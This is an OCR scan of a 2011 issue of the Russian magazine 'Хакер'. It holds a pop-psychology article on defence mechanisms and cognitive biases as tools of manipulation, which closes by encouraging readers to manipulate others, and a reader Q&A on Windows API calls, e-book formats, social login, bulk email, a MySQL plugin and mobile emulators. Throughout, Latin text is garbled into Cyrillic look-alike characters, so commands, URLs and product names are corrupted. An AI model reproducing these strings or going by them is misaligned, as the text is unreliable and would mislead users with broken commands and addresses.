Есть два выхода: 

- взяться за ум, собрать волю в кулак и 
начать работать над собой; 

- забить на все жизненные обстоятельства 
и почаще мечтать о том, «что бы я сделал, 
если бы был миллионером... Я бы ездил на 
розовом кадиллаке, каждый вечер — джа- 
кузи с шампанским, красивые девушки...». 
Тоже вроде неплохо: и масса позитивных 
эмоций, и делать ничего не надо. В рекламе 
мы часто видим предложение окунуться в 
мир, где «розовые пони кушают радугу и 
какают бабочками» всего за... «99 франков» 

- отличный фильм, показывающий, как РР 
и реклама используют человеческую сла- 
бость для обогащения. 



Отрицание 

Индивид отказывается осознать или при- 
знать травмирующую или кардинально 
новую для него информацию. В фильмах ты 
не раз видел, как человек, которому сооб- 
щили о неожиданной гибели близкого чело- 
века, отказывался в это верить, — вот тебе 
проявление отрицания. Но это хардовый 
вариант, если же брать повседневность, 



то ситуация может быть такой: девушка с 
высоким самомнением заняла в конкур- 
се последнее место. Она будет в полной 
уверенности, что произошла техническая 
ошибка: информация, которая конфликтует 
с ее установками, просто не допускается в 
сознание. 

Всемогущий контроль 

В детстве эта особенность психики 
безобидна и выглядит достаточно мило: 
малыш, закрывая глаза, считает, что во 
всем мире стало темно. Когда ребенок 
становится взрослым, этот ЗМП кажется 
уже не таким забавным: ощущение себя 
причиной всего, что происходит вокруг, 
как следствие — гиперответственность, 
как следствие — чувство вины (потому что 
невозможно контролировать, тем более 
контролировать успешно, все вокруг). 
Распространенный в России пример, хоть 
и не совсем типичный: женщина, которую 
постоянно бьет пьяный муж, считает, что 
она делает что-то не так и изо всех сил 
старается быть хорошей, но это ни к чему 
не приводит, поскольку причина агрессии 
мужа совсем в другом. Конечно, всемогу- 
щим контролем в классическом понима- 
нии это не назовешь, но если вникнуть в 
суть явления, то видно, что таким пове- 
дением она пытается контролировать 
агрессию мужа. Сочетание всемогущего 
контроля с безответственностью может 
порадовать невыносимо нарциссичной 
личностью с тенденцией ухода от реально- 
сти (ведь реальность жестоко показывает, 
кто есть кто). 
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Социальная реклама умеет вызывать вину чуть ли не на ровном месте 



туру, был плохим, а сегодня он же, раз- 
дающий по 1 кг гречки в качестве той же 
пропаганды — уже хороший. При этом в 
каждом случае он воспринимается как 
отдельная личность, а вчерашние его 
заслуги или промахи полностью нивелиру- 
ются. Расщепление встречается у людей, 
которые не могут одновременно соединить 
две конфликтующих стороны восприятия, 
им трудно понять, что человек может обла- 
дать разными качествами и характеристи- 
ками — как субъективно положительными, 
так и субъективно отрицательными. Такое 
разделение на черное и белое помогает 
упорядочить и систематизировать воспри- 



нимаемую информацию, пусть и относи- 
тельно — но внутри напряжение временно 
снимается. Ведь разве совесть позволит 
взять 1 кг гречки у плохого и лживого кан- 
дидата в депутаты? 

Вытеснение , 
(подавление) 

Другими словами, его можно назвать 
забыванием. Произошло что-то непри- 
ятное? Надо поскорее забыть (как вариант 
— залить спиртным), так вроде легче... Вот 
почему дети часто забывают травмирую- 
щие факты из детства. Опасность состоит в 
том, что «задавленные» воспоминания все 






Проекция 
(или эффект 

проекции) 

Мы не раз вспоминали проекцию в 
предыдущих статьях. Это приписывание 
окружающим людям своих (или допол- 
няющих) чувств, переживаний, восприя- 
тия. Допустим, если мне сейчас хорошо 
— я вижу вокруг счастливых и радостных 
людей, если плохо — или они все угрюмые 
и грустные, или злые и хотят еще больше 
усугубить мое плохое состояние (компле- 
ментарная проекция). 

Если у Васи внутри кипит злость и 
агрессия, в окружающих он видит то же 
самое, даже если их нет, — как раз тот 
случай, когда не замечая бревна в своем 
глазу, видишь соринку в чужом. С одной 
стороны, это повышает чувствование 
окружающих, так как позволяет сравнить 
внешние проявления эмоций, с другой — 
может быть ошибочным, так как, напри- 
мер, учащенное дыхание свойственно не 
только агрессии, но и волнению, возбуж- 
дению или тревоге. 

Бывает и так, что Вася видит в Пете 
агрессора (поскольку у самого внутри 
бушует демон) и начинает утихомиривать 
его, другими словами — навязывать ему 
предполагаемую роль и реагировать соот- 
ветственно на этот придуманный образ. В 
этом случае можно говорить о проективной 
идентификации. 

Интроекция 

Неосознаваемая попытка вобрать в себя 
черты значимых личностей, присвоение 
их взглядов на жизнь, мотивов, особен- 
ностей поведения. Особенно хорошо это 
видно на детях: они повторяют наиболее 
яркие (а иногда и совсем незаметные) 
черты родителей или киногероев, при- 
чем не наследуют осознанно (иначе 
это была бы уже идентификация), а 
бессознательно делают эти особен- 
ности своими. Почти любая установка 
или наследуемая форма (в частности, 
воспитание) — это интроект, если толь- 
ко она не осознается, а действует из 
сверхсознания, то есть, если ты уже 
воспринимаешь ее как свое собственное 
убеждение или вообще не осознаешь 
никак. Именно к этому ЗМП апеллирует 
построение культа личности: звезды шоу- 
бизнеса, популярные спортсмены и так 
далее часто становятся интроектами для 
подрастающего поколения. 

Расщепление Эго 

Восприятие в черно-белом цвете: или 
хорошо, или плохо; или правильно, или 
неправильно. Казалось бы, так восприни- 
мают все дети... Но у взрослых этот подход 
встречается ничуть не реже. Например, 
вчера депутат, толкающий свою кандида- 
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Согласно Фрейду, психика состоит из сознания и бессознательного (подсознание + сверхсо- 
знание) 



равно всплывают в виде необъяснимой тре- 
воги (факт беспокоит, но он уже «изгнан» из 
сознания и остается только эмоциональная 
реакция на него) или даже физических 
заболеваний. 

Рационализация 

Хитрый способ убедить самого себя в том, 
что «я не хочу поступать в МГУ не потому, 
что там большой конкурс, и я боюсь про- 
валиться, а потому что там слишком теоре- 
тизируют материал, а мне нужна практика» 

— короче, «Лиса и виноград». При этом 
противоречащие моменты вытесняются или 
игнорируются, а воспринимается только то, 
что подтверждает комфортную позицию. 
Если же ничего не подтверждает — можно 
логическим путем выйти на что-нибудь 
похожее и спать спокойно (да-да, логика — 
великая сила!). 

Психологические 

эффекты 

Речь об интересных и комплексных фишках, 
которые выдает наша психика. В одних 
случаях это более сложные ЗМП, в других 

— стереотипные формы, облегчающие вос- 
приятие людьми друг друга. 

Эффект леди Макбет 

Чувствуя вину (плохой поступок, предатель- 
ство) или ощущая себя грязно (например, 
после изнасилования или чего-то, что вызы- 
вает брезгливость и стресс), человек пытает- 



т* 



Розовые очки стали символом ухода в фантазии 



ІЫРО 

'Ч 

> іпіо 

Описанные в статье 
защитные механизмы 
и бессознательные 
эффекты психики 
влияют на общее вос- 
приятие окружающей 
действительности и 
способствуют воз- 
никновению иллюзий 
восприятия. 




> ѵѵагпіпд 

Место для 
строительства 
коттеджа будет 
казаться больше, 
если его разбить на 
части. Так же сад, 
разделенный на 
несколько частей, 
будет выглядеть 
обширнее, чем если 
бы это был просто 
земельный надел. 
Будь внимателен 
— этой иллюзией 
восприятия 
пользуются при 
продаже дачных 
участков, чтобы 
завысить цену. 



ся смыть негативные эмоции водой, подобно 
шекспировской леди Макбет, пытавшейся 
очистить кровь с рук, терзаясь угрызениями 
совести. Думаю, ты обращал внимание, что 
во многих обрядах принято ритуальное омо- 
вение рук, или что многие убийцы в фильмах 
после преступлений пытались смыть с себя 
не столько кровь, сколько давление совести. 
Опыты тоже подтвердили предположение о 
связи физического и ментального состояний: 
двум группам испытуемых дали задание опи- 
сать плохие поступки, которые они соверша- 
ли, после чего первой группе дали влажные 
салфетки, чтобы вытереть руки (предлог — 
«грязная клавиатура, микробы»), а второй — 
нет, и предложили бесплатно поучаствовать 
в еще одном эксперименте. Результаты пока- 
зали, что первая группа (которая «смыла» 
с себя негативные воспоминания и вину 



салфетками) преимущественно отказалась, 
вторая (у которой не было возможности 
«очиститься») — преимущественно согласи- 
лась, чтобы отработать вину. 

Думаю, понятно, что насадив искусственно 
чувство вины и стыда (обрати внимание, 
ролики подобной направленности сейчас 
появляются, как грибы после дождя), можно 
вынудить человека или целое общество к 
невыгодным для себя поступкам. 

Эффект Зейгарник 

Назван в честь Блюмы Зейгарник, впервые 
описавшей его. По ее утверждению, пре- 
рванные, незаконченные действия запоми- 
наются лучше, чем завершенные, что под- 
тверждает ряд проведенных экспериментов. 
Классический пример — официант: он хоро- 
шо помнит заказы еще не расплатившихся 
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Знаменитая леди Макбет стала 
прототипом психологического 
эффекта очищения от негативных 
эмоций 

клиентов, но почти сразу забывает блюда, 
которые заказывали клиенты, покинувшие 
ресторан. То же со студентами: пока пред- 
мет актуален (экзамены, зачеты) — уча- 
щийся помнит его хорошо, но как только он 
окончил универ, то предмет, не связанный 
с его дальнейшим обучением (скажем, в 
аспирантуре) или профессиональной дея- 
тельностью, забывается. Механизм понять 
можно — память удерживает то, что акту- 
ально, и избавляется от ненужной инфор- 
мации. 

Эффект Пигмалиона 

Человек, убежденный в чем-то, в лепешку 
разобьется ради того, чтобы подтвердить 
свои убеждения. Женщина, уверенная, 
что «все мужики — козлы», будет система- 
тически доводить каждого находящегося 
рядом мужчину, пока он не сорвется и не 
покажет свою «козлиную» (по ее мнению) 
сущность. Часто этот эффект срабатывает 
при подтверждении жизненной пози- 
ции и сопровождается репликами «Ну 
я же говорил!», «Я так и знал!», «Ну кто 
бы сомневался...». Дело в том, что если 
человек не прочувствовал другой линии 
развития событий, то он будет усиленно 
игнорировать (ЗМП: избегание, отрица- 
ние) все факты, которые противоречат его 
позиции. 

Забавно, что иногда ожидания первого 
относительно второго заставляют второго 
разбиваться в лепешку, чтобы подтвердить 
ожидания первого. Например, часто сраба- 
тывает манипуляция с двоечником: стоит 
его похвалить и сказать, что ты веришь в 
него, и на самом деле он умный и стара- 
тельный, как вчерашний хулиган изо всех 
сил постарается не разрушить тот положи- 
тельный образ, который «надел» на него 
учитель или родители. 

Различная фирменная сувенирная про- 




Иллюзия выбора — одна из самых 
приятных 



дукция (шарфики, кепки, футболки) также 
раздается не от доброй души — в этом есть 
психологическая хитрость: человек, иденти- 
фицировавший себя с этой торговой маркой 
(соответственно, убежденный в ее достой- 
ном статусе), горло перегрызет любому, кто 
усомнится в качестве продукции. Это гораз- 
до легче, чем признать, что ты лоханулся с 
выбором. 

Эффект плацебо 

Эффект, знакомый каждому хотя бы пона- 
слышке: когда таблетка сахара является 
чуть ли не панацеей. Другими словами, под 
влиянием внушения эффективности лекар- 
ства больной сам себя исцеляет. На самом 
деле внушение имеет физиологический 
характер: в этом процессе участвует чуть 
ли не половина зон головного мозга и раз- 
личные гормоны, что подтверждено экспе- 
риментально. Обратный эффект — ноцебо, 
когда под влиянием внушения состояние 
человека ухудшается. Можно сказать, что в 
обоих случаях задействован ЗМП — фанта- 
зирование. 

Эффект первого впечатления 

Впечатление, составленное о человеке 
в первые минуты, решает многое при 
дальнейшем общении. Встречают по 
одежке — провожают по уму. Но одеж- 
ку лучше подбирать тщательно, иначе 
«встречающие» могут не дать шанса 
показать свой ум. Причина — легче 
мыслить стереотипами, а не приспоса- 
бливаться, наблюдать и анализировать 
каждый раз нового субъекта или объ- 
ект. В чем-то они правы — большинство 
отыгрывает определенные социальные 
роли, на основе которых можно строить 
все взаимодействие, не задумываясь о 
личных особенностях. 

Эффект порядка 

Если из разных источников поступает 
противоречивая информация (и в настоя- 




Эффект якоря. Еріс ІаіІ 

щий момент нет возможности ее про- 
верить), то людям свойственно отдавать 
предпочтение той, что поступила первой. 
Этим успешно пользуются сотрудники- 
карьеристы, которые в конкурентной 
борьбе стараются донести до начальства 
свою точку зрения раньше своих коллег. 
При поступлении же непротиворечивой 
информации больший вес имеет та, что 
поступила последней, причем она рассма- 
тривается как уточняющая. 

Эффект ореола 

Данный эффект состоит в том, что в усло- 
виях недостатка данных о человеке мы 
ориентируемся на известную информацию 
о нем, на тот образ его (ореол), который 
уже успели составить. «Сарафанное радио» 
или отзывы о специалисте — это как раз 
проявление эффекта ореола: услышав от 
кого-то позитивные впечатления, мы зара- 
нее доверяем врачу или юристу, об уровне 
профессионализма которого пока не знаем 
на своем опыте. 

Не зря спортсмены, звезды кино- и шоу- 
бизнеса эксплуатируют свои профессио- 
нальные заслуги, когда идут в политику. 
Причем это работает, многие верят: если 
достиг успехов в спорте — сможет легко 
руководить страной. 

Эффект обобщения 

Если ты программист — у тебя обязательно 
беспорядок на столе, клавиатура залита 
пивом и единственная девушка, которую ты 
знаешь — это 5НСЮАІ\І. Даже если это не 
так, среднестатистический непрограммист 
по дефолту будет ждать от тебя именно 
этого, потому что так предписывает народ- 
ная молва. Это глобальный вариант эффек- 
та обобщения. Но бывают и частные случаи 
— например, четыре Сергея, которых ты 
знаешь, замкнуты и безэмоциональны: 
такого же характера ты, вероятно, будешь 
ждать и от последующих знакомых с име- 
нем Сергей. 

Эффект якоря 

Потрясающая особенность психики, позво- 
ляющая знающим людям манипулировать 
и иметь на этом профит. Здесь решающую 
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Иллюзии и эффекты психики сильно искажают 
межличностное восприятие 



роль играет сравнение и аналогия: если 
дать человеку якорь (когнитивный обра- 
зец для сравнения), то следующий объект 
он привяжет к нему (сравнит, возьмет за 
образец). Примеров масса. Взять хотя бы 
супермаркеты с перечеркнутыми ценника- 
ми: если ты видишь, что раньше этот товар 
стоил 400 рублей, а сейчас — 290, сознание 
мгновенно оценит «выгодность» предло- 
жения, не задумываясь о том, что реальная 
цена составляет рублей 200. Или если на 
дорогую кровать премиум-класса положить 
матрас, мягко говоря, среднего качества с 
явно завышенной ценой, он улетит в ком- 
плекте с мебелью, не вызывая сомнений у 
покупателя. 

Теория и пеактика 

иллюзорной 

относительности 

Народная мудрость гласит: «Длина минуты 
зависит от того, по какую сторону туалет- 
ной двери вы находитесь». Пытливые умы 
уже давно заметили особенность психики, 
придающую субъективный налет объектив- 
ным величинам: время, изображение, звук, 
объем. 

Воспринимал бы человек все объектив- 
но — он был бы роботом, а не человеком. 
Причем ладно, если бы это касалось 
только абстрактных понятий, таких как 
эмоции, отношения, мораль, но даже 
открыв журнал или глянув на биллборд, 
наш недоробот выхватит что-то одно и в 
упор не заметит второго. Мы все над этим 
прикалываемся, но все равно железно 
ведемся на рекламы типа «Звоните по 0 
копеек без платы за соединение!*», где 
основная фраза нарисована ярким цветом 
и огромным шрифтом, а сноска «* При 
условии абонентской платы 1500 руб./ 
месяц» — еле заметна. В обмане упрекнуть 
можно только наше восприятие, и уж никак 
не оператора, который честно указал всю 



информацию. Кстати, именно «нарисова- 
на», а не «написана» или «напечатана», 

— нарисованная фраза гораздо легче и 
быстрее воспринимается нашими органами 
зрения, что является величайшей иллю- 
зией, но работает на 100%. Нет, вру, на 98: 
на 100 сработает рисунок или фотография, 
не требующая чтения, ведь подсознание 
воспринимает образы, формы, цвета, про- 
странственное расположение, а не набор 
букв. Это благодаря сознанию прочитанная 
фраза интерпретируется в образ и только 
после этого начинает исполнять возложен- 
ную на нее функцию по атаке подсознания. 
Но здесь тоже не все однозначно — рисунок 
лучше привлекает внимание, а фотогра- 
фия — вызывает больше доверия. Тем не 
менее, мудрые рекламщики нашли выход: 
например, из нарисованного нуля вылетает 
(динамика привлекает больше, чем статика) 
сфотографированный юноша, эмоциониру- 
ющий по поводу возможности «бесплатно» 
говорить по телефону (фотоэмоции вызыва- 
ют доверие больше, чем нарисованные), и 
вокруг — еще много нарисованных гадже- 
тов яркого цвета. А если его разместить на 
3/8 листа сверху (именно в эту зону в пер- 
вую очередь падает взгляд) — получается 
очень заметный образ. 

Кроме чисто физиологического обмана 
(обман органов чувств), есть множество 
иллюзий, основанных на нашем опыте, 
социальных стереотипах, а также ЗМП и 
эффектах психики. Из тех, что чаще всего 
используются манипуляторами: 

• Эффект повального увлечения — склон- 
ность следовать выбору толпы, игнорируя 
здравый смысл: иногда на выставках спе- 
циально нанимают людей, которые толпятся 
возле стенда компании, иллюзорно повы- 
шая ее популярность. 

• Ошибка, связанная с частными примера- 
ми, когда вывод делается на основе не ста- 
тистики, а частных случаев: «Марьиванна 



два месяца пила чай для похудения и сбро- 
сила 30 кг!». 

• Иллюзия контраста (эту иллюзию когда-то 
описывал наш любимый Крис в статье про 
нить Ариадны, сравнивая оранжевые круги), 
прием постоянно используют в рекламе. 
Поскольку иллюзия и психологическая, и 
оптическая одновременно, она работает на 
ура — достаточно сфотографировать свой 
товар на фоне таких же, но ужасного каче- 
ства, и доверчивый покупатель подсозна- 
тельно сделает правильный выбор. 

• Иллюзия контроля, дающая человеку 
право думать, что он действительно что-то 
решает, величайшее благо для политиков: 
ты можешь со 100%-ной уверенностью ска- 
зать, кто действительно является президен- 
том России? 

• Иррациональное усиление — принятие 
иррациональных решений на основе про- 
шлых рациональных. Допустим, мужчина, 
имея жену в декрете с двумя маленькими 
детьми, в условиях кризиса увольняется с 
работы, основываясь на воспоминаниях о 
том, как он в 20-летнем возрасте уволился и 
спустя неделю нашел новую, более успеш- 
ную работу. К этой же иллюзии относится 
оправдание совершенно иррациональных 
действий (например, покупка неоправданно 
дорогой вещи), называемое рационализаци- 
ей после покупки. 

• Иллюзия «справедливого мира» — люди 
считают, что все воздается по заслугам. 

При этом всегда оценщик заслуг (или раз- 
решитель) — это другая личность: либо 
субличность (внутренний образ авторитета), 
либо кто-то извне, например, реклама, вос- 
клицающая «Сигареты ЭоЬгаще. Могу себе 
позволить...» или «МТС. ѴІР, ВизіпезБ и 
Орбта. Соответствовать уровню». 

Финальное 

напутствие 

Все перечисленные особенности психики 
обусловлены ничем иным, кроме как нашим 
опытом и воспитательными моментами. 
Нравится или нет — это неотъемлемая часть 
каждого человека, и этой частью можно 
пользоваться, как это делают уже давно 
некоторые люди. Ведь при правильном под- 
ходе — это оружие массового поражения. 
Оружием против тебя это может быть лишь 
в том случае, если ты не осознаешь эти осо- 
бенности, а значит, они управляют тобой. Но 
как только их осознаешь — а если прочитал, 
то уже почти осознал — ты не только выхо- 
дишь из-под их влияния, но и можешь сам 
управлять другими, кто не читал эту статью 
(да-да, без ложной скромности: описание 
механизмов можно найти много где, но там 
они не рассматриваются в связи с манипу- 
лированием). Поэтому отложи сегодня контру 
или линеечку и займись поиском и устране- 
нием у себя всех вышеописанных стереоти- 
пов. Путь к статусу Великого Манипулятора 
начинается с вот таких мелочей! :) т 



ХАКЕР 03 /146/ 201 1 



► 137 




Есть вопросы — присылай на іад@геаІ.хакер.ги 



О: Для решения самых разных задач я 
очень часто использую ѴѴіпАРІ-функции. 
Это лучший способ эмулировать актив- 
ность в любом приложении, считывать 
нужные параметры из полей — короче 
говоря, автоматизировать все и вся. Каж- 
дый раз для этого приходится писать при- 
ложение (чаще всего на С++), что очень 
муторно. Нет ли более простого способа 
вызвать нужную функцию из определен- 
ной системной библиотеки? 

А: С помощью ѴѴіпАРІ действительно можно 
творить чудеса. Мы все помним про самые 
первыетрояны для ѴѴеЬМопеу, которые как 
раз с помощью системных вызововуправля- 
ли ѴѴМ Кеерег’ом и эмулировали активность 
пользователя таким образом, чтобы его деньги 
при первом же запуске приложения перево- 
дилисьв нужном направлении. Концепт(само 
собой, онуже не работаетввидусовременных 
защитных механизмов) хорошо описан в одной 
из наших старых статей [ ЬіиѵА/ѵіпарі баск 
уѵеЬтопеѵ ). Но вернемся к вопросу. Чтобы 
вызвать произвольную системную функцию, 
необязательно писать код на том же С++ и 
компилировать его. Можно обойтись специ- 
альной утилитой ѵѵіпаріехес [ гаттісЬаеІ.сот/ 
ѵѵіпаріехес ). которая позволяет выполнить 
любые вызовы через командную строку. Син- 
таксис для запуска следующий : ѵѵіпаріехес . 
ехе ІіЬгагу . с!11@РипсСіопЫате 123 
ипісосіе_1:ехЦ "а зрасе" 

Можно последовательно выполнить несколько 
команд, указав их через запятую. Особеннос- 
ти ключей, передаваемых через командную 



строку, хорошо описаны в мануалеѵѵіпаріехес. 
Приведу несколько простых примеров исполь- 
зования программы. 

1. Запустим калькулятор и тут же удал им 
процесс из памяти: ѵѵіпаріехес . ехе 
СгеаСеРгосеззМ 0 саіс 0 0 0 0x20 0 
0 $а : 0x44 , ,,,,,,,,,,,,,,, $Ъ:16 

, Зіеер 1000 , ТеггпіпаСеРгосезз 
$$ : 11@0 0 

2. Отобразим таск-менеджер: ѵѵіпаріехес . 
ехе иОЗепсЗМеззадеМ ( и@Ріп<іѴ7іпс1оѵѵОД 
ЗЬе 11_ТгауШсі 0 ) 0x111 420 0 

3. Выведем через МеззадеВох путьдоіеплр: 
ѵѵіпаріехес . ехе ОеСТетрРаСШ' 260 
$Ь : 52 0 , и@МеззадеВохМ 0 $$:3 $$:0 
0x40 

Много три ков с системой, реализованных 
через ѴѴіпАРІ-функции, хорошо описаны в 
этой статье некого индийского программис- 
та : собедщесРщі^ 

Мапіриіабоп.азрх . 

О: Хочу купить читалку, но не знаю, 
какую выбрать. Одни понимают книги в 
формате РВ2 (как и мой телефон), мно- 
гие только еРиЬ и так далее. Что лучше? 

А: На самом деле, никакой разницы нет. 

РВ2, еРиЬ и другиеформаты — лишьописа- 
ние контейнера, в котором хранятся тексты, 
изображения и шрифты. И уж конечно, давно 
разработаны простые конвертеры между ними. 
Известный сервис 1Ь2е|щЬюдщ позволяет пре- 
образовывать книжки из РВ2 в еРиЬ в два кли- 
ка мыши. Есть более универсальные решения, 
которые поддерживают не два, а сразу множес- 



тво книжных форматов. Я заморочился этим 
вопросом, когда купил себе КіпсІІе от Атагоп 
(все-таки $139, как ни крути, хорошая цена для 
отменной читалки с ѴѴі-РІ на борту). Девайс 
предоставляет два варианта для получения 
книг: загрузка в специальном формате МОВІ 
илиже покупка в онлайн-магазине. Чтобы пе- 
ревести свою библиотеку в «родной» для КіпсІІе 
форматя нашел утилиту СаІіЬге [ саШэге-еЬоок. 
сопл ). Примечательното, что эта бесплатная 
кроссплатформенная утилита поддерживает 
практически любые форматы электронных книг 
и даже позволяетнапрямуюзакачивать книги 
в ридеры с автоматической конвертацией. 
Можно, например, взять всю свою библиотеку 
в РВ2 и разом преобразовать в нужный формат, 
автоматически забросив книги на девайс. 

О: Каждый раз мучаюсь при попытке 
безопасно извлечь устройство. В каж- 
дом третьем случае этому препятствует 
какая-то программа, причем какое 
именно приложение лочит флешку — 
понятно далеко не всегда. Как быть? 

А: Пожалуй, это главная причина, почему мно- 
гие (втом числе и я) просто выдергивают флеш- 
ку из компьютера. Пользоваться безопасным 
извлечением устройств в ѴѴіпсІоѵѵз- настоящая 
пытка. При этом я уже не раз поплатился за 
пренебрежение этим простым правилом, теряя 
ценные данные с внешнего накопителя. На са- 
мом деле, проблема легко решается с помощью 
утилит 115В За^еіу Ветоѵе ( ваМугетоѵе.сот ) 
или 2епІіто Депбто.сот ). Помимо общей 
продуманности (удобное меню с картинками 
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Удобный инструмент для безопасного извлечения внешних накопителей 



устройств, отображение правильных имен де- 
вайсов, возможность скрыть ненужныетома), 
они (о чудо!) показываютприложения, которые 
мешаютизвлечьустройство и помогаютснять 
лок. Почемутакая очевидная и понятная опция 
не реализована в стандартном инструменте 
ѴѴіпбоѵѵз, мне понять сложно. 

О: Хочу реализовать на своем сайте ав- 
торизацию через популярные сервисы 
(РасеЬоок, ВКонтакте, Соодіе и так да- 
лее) без дополнительной регистрации. 
Как это проще всего сделать? 

А: Один из самыхудобных из доступных на се- 
годняшний день вариантов — І_02ІП2а [ Іодіпга. 
ги). Это сервис, который позволяет разработ- 
чикам и вебмастерам обеспечить аутентифика- 
цию на сайте через учетные записи популяр- 
ных порталов (Яндекс, Ѳоодіе, РатЫег, Маіі. 

Ри, ЫѵеОоигпаІ, еіс), социальных сетей ВКон- 
такте и Ра се Ьоо к, а также через идентификато- 
ры ОрепЮ. Простое в освоении І_одіп 2 а.АРІ и 
наличие готовых решений на разныхязыках 
позволяют без особого труда воспользоваться 



сервисом уже сейчас. Есть плагины для разра- 
ботчиков сайтов на ѴѴогсІргезз, рбрВВ, Зоотіа, 
Содеаг, Огираіи прочих. Форма входа Логинзы 
натекущий моментустановлена более чем 
на 6 500 сайтов. Кстати, стартап недавно был 
приобретен Яндексом, а значит, у сервиса есть 
все шансы на самое быстрое развитие. 

О: Есть задача - организовать етаіі- 
рассылку по большому (действительно 
большому) списку получателей. Сна- 
чала хотел написать простой скрипт, 
который рассылал бы все с дедика 
через зепбтаіі, но оценив объем (а это 
гигабайты трафика), понял, что этот 
вариант не подойдет. Как бы реализо- 
вал рассылку ты? Сразу хочу сказать, 
что речь идет о легитимной рассылке, 
это не спам. 

А: Если ни один из готовых сервисов для 
организации рассылоквроде зиЬзсгібе.ги 
тебя неустраивает(что более чем вероятно), я 
вижу в твоей ситуации один вариант. Но зато 
какой современный и прогрессивный! Разуж 



ожидается большой и сложно предсказуемый 
объем трафика, то надо переложить проблему 
на тех, у кого мощностей всегда предостаточ- 
но -облачных провайдеров. Известный и в 
последнее время все чаще упоминаемый нами 
Аппагоп сейчас проводит открытое бета-тести- 
рование сервиса Атагоп Эітріе ЕтаіІЭегѵісе 
(5Е5), который как раз и занимается доставкой 
электронной корреспонденции из облака. 
Понятно, что ни баснословный объемтрафика, 
ни немыслимое количество писем для его 
мощностей не проблема. Отправка тысячи 
сообщений стоит$0.10. Помимо этого придется 
платить за входящий и исходящийтрафик 
(небольше$0.10за Гб). Примеры скриптов 
доступны в разделе для разработчиков ( ЬІГ 
[у/аппагоп вез зсгірЫ . поэтому попробо- 
вать сервис в действии можно прямо сейчас. 
Интересно, насколько эффективны у компании 
механизмы борьбы со спамом, ато ведьстаким 
подходом и никакие ботнеты для рассылки 
будут не нужны :). 

О: Экспериментирую с альтернативны- 
ми движками для хранения данных в 
Му50І_. Проблемы возникают с установ- 
кой РВХТ ( ігітеЬазе.о ). Можете дать 
гарантированно работающий мануал? 
А: Ниже рецепт от нашего эксперта в этой 
отрасли — Александра Лозовюка: 

1 . Сначала необходимо выяснить, где нахо- 
дится директория плагинов (подразумеваем, 
что Му5С!І_5.1 у тебя уже установлен). Для 
этого набери в консоли ппузді- клиента: зЬом 
ѵагіаЫез Ііке " %р1идіп% ". Можно также 
выполнить аналогичный 50І_-запрос через 
рбрМуАсІтіп. В ответты получишь что-то вроде 
/Ьоте/ту-изег/туздІ/ІіЬ/ппуздІ/рІидіп. 

2 . Скачай исходники плагина из І_апсЬрасІ 
(Іаипсбрасі.пеі: ). используя Ваііаг: 

Ьгг ЪгапсЬ. 1р:рЬхС /Сшр/рЬхС-згс 

3. Далее приступаем конфигурации: 

. /сопТідиге --міСЬ-тузд1=<Ъиі1(І- 
(Зіг>/<тузд1-5гс> --ѵ\/іСк-р1идіпс!іг= 
<тузд1-(Ііг>/1іЪ/тузд1/р1идіп 

4 . И, в конце концов, собираем проект: 
таке && таке іпзСаІІ. 

5 . Полученный модуль копируем в директорию 
плагинов и выполняем 5СІІ_- команду, чтобы 
ПОДКЛЮЧИТЬ НОВЫЙ плагин: ШЗТАЬЬ РШѲІМ 
рЬхС ЗСЖАМЕ ' ІіЬрЬхС . зо ' 

6 . Теперь создаем таблицу, используя новый 
ДВИЖОК: «СКЕАТЕ ТАВЬЕ СІ (сі ІпС , 

с2 СехС) епдіпе=рЬхС ;». Или изменя- 
ем уже существующую: «АЬТЕК ТАВЬЕ СІ 
епдіпе=рЬхС». 

Вуаля, теперь в качестве движка используется 
новомодный РВХТ. 

О: Как проверить, разрешает ли провай- 
дер использовать ѴРІЧ-соединения? 

А: Необходимоубедиться, что СРЕ-пакеты 
н е бл о ки ру юте я . С д ел ать это м ожн о н а са йте 
ТзЬісІсІеп.сопп — бесплатном ѴРІМ-сервисе. 
который как раз работает на РРТР Если не 
работает, то, скорее всего, СРЕ-пакеты бло- 



ХАКЕР 03 /146/ 201 1 



► 139 





ІЛЧІТ5 




А ^ 

*4 



■ к- іп 



гг 


2 


3 


4 


5 


6 




8 


9 


0 I 


В- 


ѵѵ 


Ё 


н 


т 


V 


и 


1 


о 


р 


А 


5 


О 


р 


с 


и 




К 


1 


он 1 

оо 


к 


2 


X 


с 


V 


в 


N 


м 




н| 




іш 


т 











кируются. В этом случае можно попробовать 
ОрепѴРІЧ или 55Н-туннелирование. 

О: Беремся за большой проект, пред- 
полагающий разработку клиентских 
приложений для разных мобильных 
платформ. Обеспечить всех разработ- 
чиков реальными устройствами мы не 
можем, поэтому ищу сейчас всевоз- 
можные эмуляторы. Реально ли с их 
помощью вести весь цикл отладки? 

А: Для отладки и тестирования разработок 
могут при годиться два вида инструментов: 
эмуляторы и симуляторы. В чем разница? Все 
просто. Эмулятор — это программное средство, 
которое транслирует откомпилированный коде 
оригинальной архитектуры на платформу, где он 
фактически будет выполняться. В нашем случае 
эмулятор — это десктопное приложение, кото- 
рое эмулирует железо мобильного устройства и 
работу его операционной системы, позволяя за- 
пускать и отлаживать приложения. Существуют 
также эмуляторы именно мобильныхопераци- 
онных систем (например, для ѴѴіпбоѵѵз МоЬіІе и 
Апбгоіб), не привязанные к какому-то конкрет- 
ному девайсу. Симулятор — менее сложное и ме- 
нее полезное решение, которое лишь имитирует 
работу мобильного девайса и его ОС, но не 
эмулирует железо. В любом случае, и эмуляторы, 
и симуляторы часто не предоставляют полной 
свободы для отладки приложений. Трудности 
могут возникнуть, например, притестировании 
функций, использующих цифровой гироскоп. 

В этом случае без реального устройства в боль- 
шинстве случаев не обойтись. Такили иначе, 
ниже — небольшая подборка инструментов, 
которые могуттебе понадобиться. 

• І055іти1а1ог — симулятор устройств, работа- 
ющих под управлением мобильной ОС отАррІе. 
Решение идет вместе со средой разработки 
ХСобеидоступнотолькодля платформы Мае 08 
Хі беѵеіорег.арріе.сот/беѵсепіег/юз/іпбех.асбоп : 

• Апсігоісі Етиіаіог — эмулятор операционной 
системы Апбгоіб версии 1 .1 , 1 .5, 1 .6, 2.0, 2.1 , 2.2 
& 2.3 (для работы необходимо скачать образы 
ОС и 5РК): беѵеіорег.апбгоіб.сот/диібе/ 
ОеѵеІоріпдДооІБ/етиІаІог.ЬітІ. ; 

• Затзипд ОаІахуТаЬ АсІсІ-оп — специальный 
аддон для Апсігоісі 5РК, позволяющий эмули- 
ровать работу модного планшетника Затзипд 
ОаІахуТаЬ: іппоѵаІог.затзипдтоЬІІе.сот/ 
даІахѵТаЬ.бо : 

